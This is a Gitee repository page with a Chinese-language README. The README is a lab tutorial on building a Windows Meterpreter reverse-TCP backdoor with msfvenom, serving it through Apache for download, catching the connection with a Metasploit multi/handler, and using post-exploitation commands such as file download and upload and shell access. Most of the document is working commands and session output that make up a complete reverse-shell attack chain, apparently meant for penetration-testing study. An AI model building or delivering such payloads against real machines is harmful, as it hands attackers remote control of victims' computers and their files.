# 逆向连接(kali生成被控端) **Repository Path**: chen-pusheng/study10 ## Basic Information - **Project Name**: 逆向连接(kali生成被控端) - **Description**: 逆向连接(kali生成被控端):基于Kali Linux的远程控制工具,用于安全测试和渗透测试,支持多种攻击载荷和后门功能。 - **Primary Language**: Unknown - **License**: MIT - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 1 - **Created**: 2026-01-08 - **Last Updated**: 2026-01-08 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README ### 反向连接——对被控端windows的控制 #### 1. (核心) 构造反向连接 Payload 为了实现“反向连接”,我们需要生成自己的 Payload: ![输入图片说明](https://foruda.gitee.com/images/1766583753634705651/8de97256_16434848.png "屏幕截图") 发现目标目录已生成exe文件 ![输入图片说明](https://foruda.gitee.com/images/1766584295278582036/791f9671_16434848.png "屏幕截图") - **`msfvenom`**: 启动 Metasploit 的载荷生成器工具。 - **`-p windows/meterpreter/reverse_tcp`**: - **`-p`**: 指定载荷(Payload)。 - **载荷类型**: 这是一个基于 Windows 的 **Meterpreter** 反向连接载荷。 - **功能**: 当目标运行生成的文件时,它会主动连接回攻击者的机器,并建立一个功能极其强大的 Meterpreter 控制台(支持文件操作、截屏、键盘记录等)。 - **`lhost=192.168.140.128`**: - **LHOST**: 监听主机(Listening Host)。 - **含义**: 这是(攻击者/测试者)的 Kali 系统 IP 地址。目标机器在执行程序后会尝试连接这个地址。 - **`lport=5000`**: - **LPORT**: 监听端口(Listening Port)。 - **含义**: Kali 系统上用于接收连接的端口。在 Metasploit 中设置监听器(handler)时必须匹配这个端口。 - **`-f exe -o /root/payload.exe`**: - **`-f exe`**: 指定输出格式为 Windows 可执行文件(.exe)。 - **`-o`**: 输出路径。这里将生成的程序保存在 `/root/` 目录下,文件名为 `payload.exe`。 这里我构建自己的命令: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.140.128 LPORT=5000 -f exe -o /root/win_payload.exe ``` # 1. 启动Apache服务 service apache2 start # 2. 将EXE复制到网页根目录 cp /root/win_payload.exe /var/www/html/ ![输入图片说明](https://foruda.gitee.com/images/1766584791556903242/627fc697_16434848.png "屏幕截图") # 3. Windows浏览器访问:http://192.168.140.128/win_payload.exe (下载这个exe文件) ![输入图片说明](https://foruda.gitee.com/images/1766584767912443689/1d8e5cfe_16434848.png "屏幕截图") #### 2. Kali中启动主控端 生成被控端后,需在 Kali 启动 Metasploit 监听模块,等待被控端主动连接,步骤如下 1.kali启动msf ```bash msfconsole ``` 2.接着 ```bash msf5 > use exploit/multi/handler ![输入图片说明](https://foruda.gitee.com/images/1766585674620562269/a43312a4_16434848.png "屏幕截图") msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp ``` payload => windows/meterpreter/reverse_tcp ```bash msf5 expolit(multi/handler) > set lhost 192.168.140.128 ``` lhost => 192.168.140.128 ```bash msf5 exploit(multi/handler) > set lport 5000 ``` lport => 5000 ```bash msf5 exploit(multi/handler) > exploit ``` ![输入图片说明](https://foruda.gitee.com/images/1766587042416407082/0a66758a_16434848.png "屏幕截图") 建立监听,等待受控端连接。 #### 3. 被控端打开exe可执行文件 接着发现已反向连接成功,建立`Meterpreter`交互会话; ![输入图片说明](https://foruda.gitee.com/images/1766587178646651435/a0d2c37a_16434848.png "屏幕截图") 会话建立结果:Meterpreter session 1 opened (192.168.140.128:5000 -> 192.168.140.1:11169)表示: 主控端(Kali)IP: 端口为192.168.140.128:5000; 被控端(目标设备)IP: 端口为192.168.140.1:11169; 已成功建立编号为1的 Meterpreter 会话,进入meterpreter >交互界面。 Meterpreter 是 Metasploit 的控制模块,支持多种操作,例如: ####更多命令分享 系统信息查看: meterpreter > sysinfo # 查看被控端的系统版本、架构等信息 文件操作: meterpreter > download C:\test.txt /root/ # 将被控端的test.txt下载到Kali的/root目录 meterpreter > upload /root/payload.exe C:\ # 将Kali的文件上传到被控端 命令执行: meterpreter > shell # 获得被控端的命令行交互权限 进程 / 服务管理: meterpreter > ps # 查看被控端的进程列表 可以尝试一个操作,比如查看被控端的系统版本 ![输入图片说明](https://foruda.gitee.com/images/1766587544992040818/79b46612_16434848.png "屏幕截图")